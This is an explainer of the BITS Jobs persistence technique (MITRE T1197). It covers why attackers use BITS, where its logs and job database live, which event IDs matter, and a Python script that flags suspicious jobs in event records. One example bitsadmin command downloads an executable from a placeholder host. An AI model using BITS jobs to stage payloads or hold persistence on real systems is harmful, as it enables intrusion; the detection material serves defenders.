MITRE ATT&CK (Persistence): BITS Jobs (T1197)
What is BITS?
Background Intelligent Transfer Service (BITS) is a Windows component from Microsoft that transfers files asynchronously between a client and HTTP/HTTPS servers or SMB shares, using otherwise idle network bandwidth. The transfer is carried out by the BITS service rather than by the program that requested it.
Benefits of BITS
- BITS jobs are self-contained in the BITS job database, so keeping one around requires neither a new file on disk nor a registry modification.
- Long-running jobs are supported: the default maximum job lifetime is 90 days, and it can be extended.
- BITS traffic is initiated by the BITS service itself (inside svchost.exe) over HTTP/HTTPS, so host firewalls commonly permit it.
- BITS jobs resume an interrupted transfer after a network outage or a reboot.
How to run BITS jobs?
cmd.exe /c bitsadmin /transfer JOBNAME /download /priority high http://downloadwebsite/file.exe c:\downloadfile.exe
When bitsadmin.exe runs, it creates the transfer job, hands it to the BITS service, and exits; bitsadmin.exe itself never touches the network. The BITS service runs inside svchost.exe, the generic host process for Windows services, so the download is performed by the following process, and that is the process network telemetry will attribute the connection to:
c:\windows\system32\svchost.exe -k netsvcs -p -s bits
How to detect BITS jobs?
These properties make BITS attractive to adversaries for maintaining persistence and for staging and executing malicious code. BITS-specific artifacts can be found in:
Windows event log channel: "Microsoft-Windows-Bits-Client/Operational", stored on disk as "Microsoft-Windows-Bits-Client%4Operational.evtx"
Folder location: "C:\Windows\System32\winevt\Logs"
BITS job database (queue manager files): "C:\ProgramData\Microsoft\Network\Downloader" (qmgr.db on current Windows 10 builds, qmgr0.dat and qmgr1.dat on older versions); on a live host, bitsadmin with the /list /allusers switches enumerates every queued job, including jobs created by other users.
The event IDs most useful for triage in that channel are 3 (the service created a new job; on recent Windows versions this records the creating process path and the job owner), 4 (job completed), 59 (transfer started, recording the remote URL) and 60 (transfer stopped, with a status code).
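As an added example (not code from the original post, and not a Microsoft tool), the following Python script shows the detection logic a SOC could run over Bits-Client Operational records: it correlates event 3 (job created) with event 59 (transfer started) by job ID, then flags jobs created by bitsadmin.exe or a script host, jobs fetching from a host outside an approved set, jobs whose URL host is a bare IP address, and jobs pulling an executable payload such as the file.exe in the command above. The event records are constructed for the demonstration; the EventData field names (jobTitle, jobId, jobOwner, processPath, url) follow that channel's schema, while APPROVED_HOSTS and LOLBIN_CREATORS are assumed tuning values that a real deployment would replace with its own baseline.

```python
"""Triage Microsoft-Windows-Bits-Client/Operational records for suspicious BITS jobs.

Added example for this post, not the page's own code.  It runs offline over
constructed sample records; field names follow the channel's EventData schema,
and the allowlists below are assumed tuning values, not Microsoft defaults.
"""
import ipaddress
from collections import defaultdict
from urllib.parse import urlparse

# Event IDs used from Microsoft-Windows-Bits-Client/Operational.
JOB_CREATED = 3        # "The BITS service created a new job" (carries processPath)
TRANSFER_STARTED = 59  # "BITS started the ... transfer job" (carries url)

# ASSUMED tuning for the demo; a real deployment derives these from its baseline.
APPROVED_HOSTS = {"download.windowsupdate.com", "tlu.dl.delivery.mp.microsoft.com"}
LOLBIN_CREATORS = {
    "bitsadmin.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe",
}
EXECUTABLE_EXTS = (".exe", ".dll", ".ps1", ".vbs", ".js", ".hta", ".scr", ".bat", ".cmd")

# Constructed sample records (not real telemetry); each dict is one event's EventData.
SAMPLE_EVENTS = [
    {"EventID": 3, "jobId": "{A1}", "jobTitle": "WU Client Download",
     "jobOwner": "NT AUTHORITY\\SYSTEM", "processPath": "C:\\Windows\\System32\\svchost.exe"},
    {"EventID": 59, "jobId": "{A1}", "jobTitle": "WU Client Download",
     "url": "http://download.windowsupdate.com/d/msdownload/update/software/defu/defs.cab"},
    {"EventID": 3, "jobId": "{B2}", "jobTitle": "JOBNAME",
     "jobOwner": "CORP\\jdoe", "processPath": "C:\\Windows\\System32\\bitsadmin.exe"},
    {"EventID": 59, "jobId": "{B2}", "jobTitle": "JOBNAME", "url": "http://downloadwebsite/file.exe"},
    {"EventID": 3, "jobId": "{C3}", "jobTitle": "Updater", "jobOwner": "CORP\\jdoe",
     "processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"EventID": 59, "jobId": "{C3}", "jobTitle": "Updater", "url": "https://203.0.113.10/stage/payload.txt"},
]


def _is_ip_literal(host):
    """True if the URL host is a bare IPv4/IPv6 address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def correlate(events):
    """Group records by jobId so each job's creator (event 3) and URLs (event 59) sit together."""
    jobs = defaultdict(lambda: {"title": None, "owner": None, "creator": None, "urls": []})
    for ev in events:
        job = jobs[ev["jobId"]]
        job["title"] = ev.get("jobTitle", job["title"])
        if ev["EventID"] == JOB_CREATED:
            job["owner"] = ev.get("jobOwner")
            job["creator"] = ev.get("processPath")
        elif ev["EventID"] == TRANSFER_STARTED:
            job["urls"].append(ev["url"])
    return dict(jobs)


def assess(job):
    """Return the reasons a correlated job looks suspicious; an empty list means benign."""
    reasons = []
    creator = (job["creator"] or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if creator in LOLBIN_CREATORS:
        reasons.append(f"created_by_lolbin:{creator}")
    for url in job["urls"]:
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host and host not in APPROVED_HOSTS:
            reasons.append(f"unapproved_host:{host}")
        if _is_ip_literal(host):
            reasons.append(f"ip_literal_host:{host}")
        if parsed.path.lower().endswith(EXECUTABLE_EXTS):
            reasons.append("executable_payload:" + parsed.path.rsplit("/", 1)[-1])
    return reasons


def triage(events):
    """Return {jobId: finding} for every job that assess() flags."""
    findings = {}
    for job_id, job in correlate(events).items():
        reasons = assess(job)
        if reasons:
            findings[job_id] = {"title": job["title"], "owner": job["owner"],
                                "creator": job["creator"], "reasons": reasons}
    return findings


if __name__ == "__main__":
    for job_id, finding in triage(SAMPLE_EVENTS).items():
        print(f"{job_id} {finding['title']!r} by {finding['creator']}: {', '.join(finding['reasons'])}")
```

In practice the input would be the channel exported to JSON (for example via Get-WinEvent -LogName Microsoft-Windows-Bits-Client/Operational) or the output of an EVTX parser. The job-ID correlation is the important step: the creating process appears only in event 3 and the URL only in event 59, and, as noted above, the network connection is made by svchost.exe, so process-level network telemetry alone will not lead back to bitsadmin.exe.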
References:
https://www.sans.org/reading-room/whitepapers/forensics/bits-forensics-39195